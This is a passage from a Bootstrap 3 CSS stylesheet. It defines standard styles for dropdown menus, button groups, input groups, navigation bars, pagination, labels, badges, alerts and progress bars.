padding: 3px 20px; clear: both; font-weight: normal; line-height: 1.42857143; color: #333; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus { color: #262626; text-decoration: none; background-color: #f5f5f5; } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #fff; text-decoration: none; background-color: #337ab7; outline: 0; } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #777; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; cursor: not-allowed; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .open > .dropdown-menu { display: block; } .open > a { outline: 0; } .dropdown-menu-right { right: 0; left: auto; } .dropdown-menu-left { right: auto; left: 0; } .dropdown-header { display: block; padding: 3px 20px; font-size: 12px; line-height: 1.42857143; color: #777; white-space: nowrap; } .dropdown-backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; z-index: 990; } .pull-right > .dropdown-menu { right: 0; left: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { content: ""; border-top: 0; border-bottom: 4px solid; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 2px; } @media (min-width: 768px) { .navbar-right .dropdown-menu { right: 0; left: auto; } .navbar-right .dropdown-menu-left { right: auto; left: 0; } } .btn-group, .btn-group-vertical { position: relative; display: inline-block; vertical-align: middle; } .btn-group > .btn, .btn-group-vertical > .btn { position: relative; float: left; } .btn-group > .btn:hover, .btn-group-vertical > .btn:hover, .btn-group > .btn:focus, .btn-group-vertical > .btn:focus, .btn-group > .btn:active, .btn-group-vertical > .btn:active, .btn-group > .btn.active, .btn-group-vertical > .btn.active { z-index: 2; } .btn-group .btn + .btn, .btn-group .btn + .btn-group, .btn-group .btn-group + .btn, .btn-group .btn-group + .btn-group { margin-left: -1px; } .btn-toolbar { margin-left: -5px; } .btn-toolbar .btn-group, .btn-toolbar .input-group { float: left; } .btn-toolbar > .btn, .btn-toolbar > .btn-group, .btn-toolbar > .input-group { margin-left: 5px; } .btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) { border-radius: 0; } .btn-group > .btn:first-child { margin-left: 0; } .btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .btn-group > .btn:last-child:not(:first-child), .btn-group > .dropdown-toggle:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .btn-group > .btn-group { float: left; } .btn-group > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle { border-top-right-radius: 0; border-bottom-right-radius: 0; } .btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child { border-top-left-radius: 0; border-bottom-left-radius: 0; } .btn-group .dropdown-toggle:active, .btn-group.open .dropdown-toggle { outline: 0; } .btn-group > .btn + .dropdown-toggle { padding-right: 8px; padding-left: 8px; } .btn-group > .btn-lg + .dropdown-toggle { padding-right: 12px; padding-left: 12px; } .btn-group.open .dropdown-toggle { -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); } .btn-group.open .dropdown-toggle.btn-link { -webkit-box-shadow: none; box-shadow: none; } .btn .caret { margin-left: 0; } .btn-lg .caret { border-width: 5px 5px 0; border-bottom-width: 0; } .dropup .btn-lg .caret { border-width: 0 5px 5px; } .btn-group-vertical > .btn, .btn-group-vertical > .btn-group, .btn-group-vertical > .btn-group > .btn { display: block; float: none; width: 100%; max-width: 100%; } .btn-group-vertical > .btn-group > .btn { float: none; } .btn-group-vertical > .btn + .btn, .btn-group-vertical > .btn + .btn-group, .btn-group-vertical > .btn-group + .btn, .btn-group-vertical > .btn-group + .btn-group { margin-top: -1px; margin-left: 0; } .btn-group-vertical > .btn:not(:first-child):not(:last-child) { border-radius: 0; } .btn-group-vertical > .btn:first-child:not(:last-child) { border-top-right-radius: 4px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn:last-child:not(:first-child) { border-top-left-radius: 0; border-top-right-radius: 0; border-bottom-left-radius: 4px; } .btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn { border-radius: 0; } .btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child { border-top-left-radius: 0; border-top-right-radius: 0; } .btn-group-justified { display: table; width: 100%; table-layout: fixed; border-collapse: separate; } .btn-group-justified > .btn, .btn-group-justified > .btn-group { display: table-cell; float: none; width: 1%; } .btn-group-justified > .btn-group .btn { width: 100%; } .btn-group-justified > .btn-group .dropdown-menu { left: auto; } [data-toggle="buttons"] > .btn input[type="radio"], [data-toggle="buttons"] > .btn-group > .btn input[type="radio"], [data-toggle="buttons"] > .btn input[type="checkbox"], [data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] { position: absolute; clip: rect(0, 0, 0, 0); pointer-events: none; } .input-group { position: relative; display: table; border-collapse: separate; } .input-group[class*="col-"] { float: none; padding-right: 0; padding-left: 0; } .input-group .form-control { position: relative; z-index: 2; float: left; width: 100%; margin-bottom: 0; } .input-group-lg > .form-control, .input-group-lg > .input-group-addon, .input-group-lg > .input-group-btn > .btn { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.3333333; border-radius: 6px; } select.input-group-lg > .form-control, select.input-group-lg > .input-group-addon, select.input-group-lg > .input-group-btn > .btn { height: 46px; line-height: 46px; } textarea.input-group-lg > .form-control, textarea.input-group-lg > .input-group-addon, textarea.input-group-lg > .input-group-btn > .btn, select[multiple].input-group-lg > .form-control, select[multiple].input-group-lg > .input-group-addon, select[multiple].input-group-lg > .input-group-btn > .btn { height: auto; } .input-group-sm > .form-control, .input-group-sm > .input-group-addon, .input-group-sm > .input-group-btn > .btn { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-group-sm > .form-control, select.input-group-sm > .input-group-addon, select.input-group-sm > .input-group-btn > .btn { height: 30px; line-height: 30px; } textarea.input-group-sm > .form-control, textarea.input-group-sm > .input-group-addon, textarea.input-group-sm > .input-group-btn > .btn, select[multiple].input-group-sm > .form-control, select[multiple].input-group-sm > .input-group-addon, select[multiple].input-group-sm > .input-group-btn > .btn { height: auto; } .input-group-addon, .input-group-btn, .input-group .form-control { display: table-cell; } .input-group-addon:not(:first-child):not(:last-child), .input-group-btn:not(:first-child):not(:last-child), .input-group .form-control:not(:first-child):not(:last-child) { border-radius: 0; } .input-group-addon, .input-group-btn { width: 1%; white-space: nowrap; vertical-align: middle; } .input-group-addon { padding: 6px 12px; font-size: 14px; font-weight: normal; line-height: 1; color: #555; text-align: center; background-color: #eee; border: 1px solid #ccc; border-radius: 4px; } .input-group-addon.input-sm { padding: 5px 10px; font-size: 12px; border-radius: 3px; } .input-group-addon.input-lg { padding: 10px 16px; font-size: 18px; border-radius: 6px; } .input-group-addon input[type="radio"], .input-group-addon input[type="checkbox"] { margin-top: 0; } .input-group .form-control:first-child, .input-group-addon:first-child, .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group > .btn, .input-group-btn:first-child > .dropdown-toggle, .input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle), .input-group-btn:last-child > .btn-group:not(:last-child) > .btn { border-top-right-radius: 0; border-bottom-right-radius: 0; } .input-group-addon:first-child { border-right: 0; } .input-group .form-control:last-child, .input-group-addon:last-child, .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group > .btn, .input-group-btn:last-child > .dropdown-toggle, .input-group-btn:first-child > .btn:not(:first-child), .input-group-btn:first-child > .btn-group:not(:first-child) > .btn { border-top-left-radius: 0; border-bottom-left-radius: 0; } .input-group-addon:last-child { border-left: 0; } .input-group-btn { position: relative; font-size: 0; white-space: nowrap; } .input-group-btn > .btn { position: relative; } .input-group-btn > .btn + .btn { margin-left: -1px; } .input-group-btn > .btn:hover, .input-group-btn > .btn:focus, .input-group-btn > .btn:active { z-index: 2; } .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group { margin-right: -1px; } .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group { margin-left: -1px; } .nav { padding-left: 0; margin-bottom: 0; list-style: none; } .nav > li { position: relative; display: block; } .nav > li > a { position: relative; display: block; padding: 10px 15px; } .nav > li > a:hover, .nav > li > a:focus { text-decoration: none; background-color: #eee; } .nav > li.disabled > a { color: #777; } .nav > li.disabled > a:hover, .nav > li.disabled > a:focus { color: #777; text-decoration: none; cursor: not-allowed; background-color: transparent; } .nav .open > a, .nav .open > a:hover, .nav .open > a:focus { background-color: #eee; border-color: #337ab7; } .nav .nav-divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .nav > li > a > img { max-width: none; } .nav-tabs { border-bottom: 1px solid #ddd; } .nav-tabs > li { float: left; margin-bottom: -1px; } .nav-tabs > li > a { margin-right: 2px; line-height: 1.42857143; border: 1px solid transparent; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover { border-color: #eee #eee #ddd; } .nav-tabs > li.active > a, .nav-tabs > li.active > a:hover, .nav-tabs > li.active > a:focus { color: #555; cursor: default; background-color: #fff; border: 1px solid #ddd; border-bottom-color: transparent; } .nav-tabs.nav-justified { width: 100%; border-bottom: 0; } .nav-tabs.nav-justified > li { float: none; } .nav-tabs.nav-justified > li > a { margin-bottom: 5px; text-align: center; } .nav-tabs.nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-tabs.nav-justified > li { display: table-cell; width: 1%; } .nav-tabs.nav-justified > li > a { margin-bottom: 0; } } .nav-tabs.nav-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border: 1px solid #ddd; } @media (min-width: 768px) { .nav-tabs.nav-justified > li > a { border-bottom: 1px solid #ddd; border-radius: 4px 4px 0 0; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border-bottom-color: #fff; } } .nav-pills > li { float: left; } .nav-pills > li > a { border-radius: 4px; } .nav-pills > li + li { margin-left: 2px; } .nav-pills > li.active > a, .nav-pills > li.active > a:hover, .nav-pills > li.active > a:focus { color: #fff; background-color: #337ab7; } .nav-stacked > li { float: none; } .nav-stacked > li + li { margin-top: 2px; margin-left: 0; } .nav-justified { width: 100%; } .nav-justified > li { float: none; } .nav-justified > li > a { margin-bottom: 5px; text-align: center; } .nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-justified > li { display: table-cell; width: 1%; } .nav-justified > li > a { margin-bottom: 0; } } .nav-tabs-justified { border-bottom: 0; } .nav-tabs-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border: 1px solid #ddd; } @media (min-width: 768px) { .nav-tabs-justified > li > a { border-bottom: 1px solid #ddd; border-radius: 4px 4px 0 0; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border-bottom-color: #fff; } } .tab-content > .tab-pane { display: none; } .tab-content > .active { display: block; } .nav-tabs .dropdown-menu { margin-top: -1px; border-top-left-radius: 0; border-top-right-radius: 0; } .navbar { position: relative; min-height: 50px; margin-bottom: 20px; border: 1px solid transparent; } @media (min-width: 768px) { .navbar { border-radius: 4px; } } @media (min-width: 768px) { .navbar-header { float: left; } } .navbar-collapse { padding-right: 15px; padding-left: 15px; overflow-x: visible; -webkit-overflow-scrolling: touch; border-top: 1px solid transparent; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1); box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1); } .navbar-collapse.in { overflow-y: auto; } @media (min-width: 768px) { .navbar-collapse { width: auto; border-top: 0; -webkit-box-shadow: none; box-shadow: none; } .navbar-collapse.collapse { display: block !important; height: auto !important; padding-bottom: 0; overflow: visible !important; } .navbar-collapse.in { overflow-y: visible; } .navbar-fixed-top .navbar-collapse, .navbar-static-top .navbar-collapse, .navbar-fixed-bottom .navbar-collapse { padding-right: 0; padding-left: 0; } } .navbar-fixed-top .navbar-collapse, .navbar-fixed-bottom .navbar-collapse { max-height: 340px; } @media (max-device-width: 480px) and (orientation: landscape) { .navbar-fixed-top .navbar-collapse, .navbar-fixed-bottom .navbar-collapse { max-height: 200px; } } .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: -15px; margin-left: -15px; } @media (min-width: 768px) { .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: 0; margin-left: 0; } } .navbar-static-top { z-index: 1000; border-width: 0 0 1px; } @media (min-width: 768px) { .navbar-static-top { border-radius: 0; } } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; right: 0; left: 0; z-index: 1030; } @media (min-width: 768px) { .navbar-fixed-top, .navbar-fixed-bottom { border-radius: 0; } } .navbar-fixed-top { top: 0; border-width: 0 0 1px; } .navbar-fixed-bottom { bottom: 0; margin-bottom: 0; border-width: 1px 0 0; } .navbar-brand { float: left; height: 50px; padding: 15px 15px; font-size: 18px; line-height: 20px; } .navbar-brand:hover, .navbar-brand:focus { text-decoration: none; } .navbar-brand > img { display: block; } @media (min-width: 768px) { .navbar > .container .navbar-brand, .navbar > .container-fluid .navbar-brand { margin-left: -15px; } } .navbar-toggle { position: relative; float: right; padding: 9px 10px; margin-top: 8px; margin-right: 15px; margin-bottom: 8px; background-color: transparent; background-image: none; border: 1px solid transparent; border-radius: 4px; } .navbar-toggle:focus { outline: 0; } .navbar-toggle .icon-bar { display: block; width: 22px; height: 2px; border-radius: 1px; } .navbar-toggle .icon-bar + .icon-bar { margin-top: 4px; } @media (min-width: 768px) { .navbar-toggle { display: none; } } .navbar-nav { margin: 7.5px -15px; } .navbar-nav > li > a { padding-top: 10px; padding-bottom: 10px; line-height: 20px; } @media (max-width: 767px) { .navbar-nav .open .dropdown-menu { position: static; float: none; width: auto; margin-top: 0; background-color: transparent; border: 0; -webkit-box-shadow: none; box-shadow: none; } .navbar-nav .open .dropdown-menu > li > a, .navbar-nav .open .dropdown-menu .dropdown-header { padding: 5px 15px 5px 25px; } .navbar-nav .open .dropdown-menu > li > a { line-height: 20px; } .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-nav .open .dropdown-menu > li > a:focus { background-image: none; } } @media (min-width: 768px) { .navbar-nav { float: left; margin: 0; } .navbar-nav > li { float: left; } .navbar-nav > li > a { padding-top: 15px; padding-bottom: 15px; } } .navbar-form { padding: 10px 15px; margin-top: 8px; margin-right: -15px; margin-bottom: 8px; margin-left: -15px; border-top: 1px solid transparent; border-bottom: 1px solid transparent; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1); box-shadow: inset 0 1px 0 rgba(255, 255, 255, .1), 0 1px 0 rgba(255, 255, 255, .1); } @media (min-width: 768px) { .navbar-form .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .navbar-form .form-control { display: inline-block; width: auto; vertical-align: middle; } .navbar-form .form-control-static { display: inline-block; } .navbar-form .input-group { display: inline-table; vertical-align: middle; } .navbar-form .input-group .input-group-addon, .navbar-form .input-group .input-group-btn, .navbar-form .input-group .form-control { width: auto; } .navbar-form .input-group > .form-control { width: 100%; } .navbar-form .control-label { margin-bottom: 0; vertical-align: middle; } .navbar-form .radio, .navbar-form .checkbox { display: inline-block; margin-top: 0; margin-bottom: 0; vertical-align: middle; } .navbar-form .radio label, .navbar-form .checkbox label { padding-left: 0; } .navbar-form .radio input[type="radio"], .navbar-form .checkbox input[type="checkbox"] { position: relative; margin-left: 0; } .navbar-form .has-feedback .form-control-feedback { top: 0; } } @media (max-width: 767px) { .navbar-form .form-group { margin-bottom: 5px; } .navbar-form .form-group:last-child { margin-bottom: 0; } } @media (min-width: 768px) { .navbar-form { width: auto; padding-top: 0; padding-bottom: 0; margin-right: 0; margin-left: 0; border: 0; -webkit-box-shadow: none; box-shadow: none; } } .navbar-nav > li > .dropdown-menu { margin-top: 0; border-top-left-radius: 0; border-top-right-radius: 0; } .navbar-fixed-bottom .navbar-nav > li > .dropdown-menu { margin-bottom: 0; border-top-left-radius: 4px; border-top-right-radius: 4px; border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .navbar-btn { margin-top: 8px; margin-bottom: 8px; } .navbar-btn.btn-sm { margin-top: 10px; margin-bottom: 10px; } .navbar-btn.btn-xs { margin-top: 14px; margin-bottom: 14px; } .navbar-text { margin-top: 15px; margin-bottom: 15px; } @media (min-width: 768px) { .navbar-text { float: left; margin-right: 15px; margin-left: 15px; } } @media (min-width: 768px) { .navbar-left { float: left !important; } .navbar-right { float: right !important; margin-right: -15px; } .navbar-right ~ .navbar-right { margin-right: 0; } } .navbar-default { background-color: #f8f8f8; border-color: #e7e7e7; } .navbar-default .navbar-brand { color: #777; } .navbar-default .navbar-brand:hover, .navbar-default .navbar-brand:focus { color: #5e5e5e; background-color: transparent; } .navbar-default .navbar-text { color: #777; } .navbar-default .navbar-nav > li > a { color: #777; } .navbar-default .navbar-nav > li > a:hover, .navbar-default .navbar-nav > li > a:focus { color: #333; background-color: transparent; } .navbar-default .navbar-nav > .active > a, .navbar-default .navbar-nav > .active > a:hover, .navbar-default .navbar-nav > .active > a:focus { color: #555; background-color: #e7e7e7; } .navbar-default .navbar-nav > .disabled > a, .navbar-default .navbar-nav > .disabled > a:hover, .navbar-default .navbar-nav > .disabled > a:focus { color: #ccc; background-color: transparent; } .navbar-default .navbar-toggle { border-color: #ddd; } .navbar-default .navbar-toggle:hover, .navbar-default .navbar-toggle:focus { background-color: #ddd; } .navbar-default .navbar-toggle .icon-bar { background-color: #888; } .navbar-default .navbar-collapse, .navbar-default .navbar-form { border-color: #e7e7e7; } .navbar-default .navbar-nav > .open > a, .navbar-default .navbar-nav > .open > a:hover, .navbar-default .navbar-nav > .open > a:focus { color: #555; background-color: #e7e7e7; } @media (max-width: 767px) { .navbar-default .navbar-nav .open .dropdown-menu > li > a { color: #777; } .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus { color: #333; background-color: transparent; } .navbar-default .navbar-nav .open .dropdown-menu > .active > a, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus { color: #555; background-color: #e7e7e7; } .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #ccc; background-color: transparent; } } .navbar-default .navbar-link { color: #777; } .navbar-default .navbar-link:hover { color: #333; } .navbar-default .btn-link { color: #777; } .navbar-default .btn-link:hover, .navbar-default .btn-link:focus { color: #333; } .navbar-default .btn-link[disabled]:hover, fieldset[disabled] .navbar-default .btn-link:hover, .navbar-default .btn-link[disabled]:focus, fieldset[disabled] .navbar-default .btn-link:focus { color: #ccc; } .navbar-inverse { background-color: #222; border-color: #080808; } .navbar-inverse .navbar-brand { color: #9d9d9d; } .navbar-inverse .navbar-brand:hover, .navbar-inverse .navbar-brand:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-text { color: #9d9d9d; } .navbar-inverse .navbar-nav > li > a { color: #9d9d9d; } .navbar-inverse .navbar-nav > li > a:hover, .navbar-inverse .navbar-nav > li > a:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-nav > .active > a, .navbar-inverse .navbar-nav > .active > a:hover, .navbar-inverse .navbar-nav > .active > a:focus { color: #fff; background-color: #080808; } .navbar-inverse .navbar-nav > .disabled > a, .navbar-inverse .navbar-nav > .disabled > a:hover, .navbar-inverse .navbar-nav > .disabled > a:focus { color: #444; background-color: transparent; } .navbar-inverse .navbar-toggle { border-color: #333; } .navbar-inverse .navbar-toggle:hover, .navbar-inverse .navbar-toggle:focus { background-color: #333; } .navbar-inverse .navbar-toggle .icon-bar { background-color: #fff; } .navbar-inverse .navbar-collapse, .navbar-inverse .navbar-form { border-color: #101010; } .navbar-inverse .navbar-nav > .open > a, .navbar-inverse .navbar-nav > .open > a:hover, .navbar-inverse .navbar-nav > .open > a:focus { color: #fff; background-color: #080808; } @media (max-width: 767px) { .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header { border-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu .divider { background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a { color: #9d9d9d; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus { color: #fff; background-color: transparent; } .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus { color: #fff; background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #444; background-color: transparent; } } .navbar-inverse .navbar-link { color: #9d9d9d; } .navbar-inverse .navbar-link:hover { color: #fff; } .navbar-inverse .btn-link { color: #9d9d9d; } .navbar-inverse .btn-link:hover, .navbar-inverse .btn-link:focus { color: #fff; } .navbar-inverse .btn-link[disabled]:hover, fieldset[disabled] .navbar-inverse .btn-link:hover, .navbar-inverse .btn-link[disabled]:focus, fieldset[disabled] .navbar-inverse .btn-link:focus { color: #444; } .breadcrumb { padding: 8px 15px; margin-bottom: 20px; list-style: none; background-color: #f5f5f5; border-radius: 4px; } .breadcrumb > li { display: inline-block; } .breadcrumb > li + li:before { padding: 0 5px; color: #ccc; content: "/\00a0"; } .breadcrumb > .active { color: #777; } .pagination { display: inline-block; padding-left: 0; margin: 20px 0; border-radius: 4px; } .pagination > li { display: inline; } .pagination > li > a, .pagination > li > span { position: relative; float: left; padding: 6px 12px; margin-left: -1px; line-height: 1.42857143; color: #337ab7; text-decoration: none; background-color: #fff; border: 1px solid #ddd; } .pagination > li:first-child > a, .pagination > li:first-child > span { margin-left: 0; border-top-left-radius: 4px; border-bottom-left-radius: 4px; } .pagination > li:last-child > a, .pagination > li:last-child > span { border-top-right-radius: 4px; border-bottom-right-radius: 4px; } .pagination > li > a:hover, .pagination > li > span:hover, .pagination > li > a:focus, .pagination > li > span:focus { color: #23527c; background-color: #eee; border-color: #ddd; } .pagination > .active > a, .pagination > .active > span, .pagination > .active > a:hover, .pagination > .active > span:hover, .pagination > .active > a:focus, .pagination > .active > span:focus { z-index: 2; color: #fff; cursor: default; background-color: #337ab7; border-color: #337ab7; } .pagination > .disabled > span, .pagination > .disabled > span:hover, .pagination > .disabled > span:focus, .pagination > .disabled > a, .pagination > .disabled > a:hover, .pagination > .disabled > a:focus { color: #777; cursor: not-allowed; background-color: #fff; border-color: #ddd; } .pagination-lg > li > a, .pagination-lg > li > span { padding: 10px 16px; font-size: 18px; } .pagination-lg > li:first-child > a, .pagination-lg > li:first-child > span { border-top-left-radius: 6px; border-bottom-left-radius: 6px; } .pagination-lg > li:last-child > a, .pagination-lg > li:last-child > span { border-top-right-radius: 6px; border-bottom-right-radius: 6px; } .pagination-sm > li > a, .pagination-sm > li > span { padding: 5px 10px; font-size: 12px; } .pagination-sm > li:first-child > a, .pagination-sm > li:first-child > span { border-top-left-radius: 3px; border-bottom-left-radius: 3px; } .pagination-sm > li:last-child > a, .pagination-sm > li:last-child > span { border-top-right-radius: 3px; border-bottom-right-radius: 3px; } .pager { padding-left: 0; margin: 20px 0; text-align: center; list-style: none; } .pager li { display: inline; } .pager li > a, .pager li > span { display: inline-block; padding: 5px 14px; background-color: #fff; border: 1px solid #ddd; border-radius: 15px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: #eee; } .pager .next > a, .pager .next > span { float: right; } .pager .previous > a, .pager .previous > span { float: left; } .pager .disabled > a, .pager .disabled > a:hover, .pager .disabled > a:focus, .pager .disabled > span { color: #777; cursor: not-allowed; background-color: #fff; } .label { display: inline; padding: .2em .6em .3em; font-size: 75%; font-weight: bold; line-height: 1; color: #fff; text-align: center; white-space: nowrap; vertical-align: baseline; border-radius: .25em; } a.label:hover, a.label:focus { color: #fff; text-decoration: none; cursor: pointer; } .label:empty { display: none; } .btn .label { position: relative; top: -1px; } .label-default { background-color: #777; } .label-default[href]:hover, .label-default[href]:focus { background-color: #5e5e5e; } .label-primary { background-color: #337ab7; } .label-primary[href]:hover, .label-primary[href]:focus { background-color: #286090; } .label-success { background-color: #5cb85c; } .label-success[href]:hover, .label-success[href]:focus { background-color: #449d44; } .label-info { background-color: #5bc0de; } .label-info[href]:hover, .label-info[href]:focus { background-color: #31b0d5; } .label-warning { background-color: #f0ad4e; } .label-warning[href]:hover, .label-warning[href]:focus { background-color: #ec971f; } .label-danger { background-color: #d9534f; } .label-danger[href]:hover, .label-danger[href]:focus { background-color: #c9302c; } .badge { display: inline-block; min-width: 10px; padding: 3px 7px; font-size: 12px; font-weight: bold; line-height: 1; color: #fff; text-align: center; white-space: nowrap; vertical-align: baseline; background-color: #777; border-radius: 10px; } .badge:empty { display: none; } .btn .badge { position: relative; top: -1px; } .btn-xs .badge, .btn-group-xs > .btn .badge { top: 0; padding: 1px 5px; } a.badge:hover, a.badge:focus { color: #fff; text-decoration: none; cursor: pointer; } .list-group-item.active > .badge, .nav-pills > .active > a > .badge { color: #337ab7; background-color: #fff; } .list-group-item > .badge { float: right; } .list-group-item > .badge + .badge { margin-right: 5px; } .nav-pills > li > a > .badge { margin-left: 3px; } .jumbotron { padding: 30px 15px; margin-bottom: 30px; color: inherit; background-color: #eee; } .jumbotron h1, .jumbotron .h1 { color: inherit; } .jumbotron p { margin-bottom: 15px; font-size: 21px; font-weight: 200; } .jumbotron > hr { border-top-color: #d5d5d5; } .container .jumbotron, .container-fluid .jumbotron { border-radius: 6px; } .jumbotron .container { max-width: 100%; } @media screen and (min-width: 768px) { .jumbotron { padding: 48px 0; } .container .jumbotron, .container-fluid .jumbotron { padding-right: 60px; padding-left: 60px; } .jumbotron h1, .jumbotron .h1 { font-size: 63px; } } .thumbnail { display: block; padding: 4px; margin-bottom: 20px; line-height: 1.42857143; background-color: #fff; border: 1px solid #ddd; border-radius: 4px; -webkit-transition: border .2s ease-in-out; -o-transition: border .2s ease-in-out; transition: border .2s ease-in-out; } .thumbnail > img, .thumbnail a > img { margin-right: auto; margin-left: auto; } a.thumbnail:hover, a.thumbnail:focus, a.thumbnail.active { border-color: #337ab7; } .thumbnail .caption { padding: 9px; color: #333; } .alert { padding: 15px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px; } .alert h4 { margin-top: 0; color: inherit; } .alert .alert-link { font-weight: bold; } .alert > p, .alert > ul { margin-bottom: 0; } .alert > p + p { margin-top: 5px; } .alert-dismissable, .alert-dismissible { padding-right: 35px; } .alert-dismissable .close, .alert-dismissible .close { position: relative; top: -2px; right: -21px; color: inherit; } .alert-success { color: #3c763d; background-color: #dff0d8; border-color: #d6e9c6; } .alert-success hr { border-top-color: #c9e2b3; } .alert-success .alert-link { color: #2b542c; } .alert-info { color: #31708f; background-color: #d9edf7; border-color: #bce8f1; } .alert-info hr { border-top-color: #a6e1ec; } .alert-info .alert-link { color: #245269; } .alert-warning { color: #8a6d3b; background-color: #fcf8e3; border-color: #faebcc; } .alert-warning hr { border-top-color: #f7e1b5; } .alert-warning .alert-link { color: #66512c; } .alert-danger { color: #a94442; background-color: #f2dede; border-color: #ebccd1; } .alert-danger hr { border-top-color: #e4b9c0; } .alert-danger .alert-link { color: #843534; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @-o-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } .progress { height: 20px; margin-bottom: 20px; overflow: hidden; background-color: #f5f5f5; border-radius: 4px; -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1); box-shadow: inset 0 1px 2px rgba(0, 0, 0, .1); } .progress-bar { float: left; width: 0; height: 100%; font-size: 12px; line-height: 20px; color: #fff; text-align: center; background-color: #337ab7; -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .15); -webkit-transition: width .6s ease; -o-transition: width .6s ease; transition: width .6s ease; } .progress-striped .progress-bar, .progress-bar-striped { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, .15) 50%, rgba(255, 255, 255, .15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, .15) 25%, 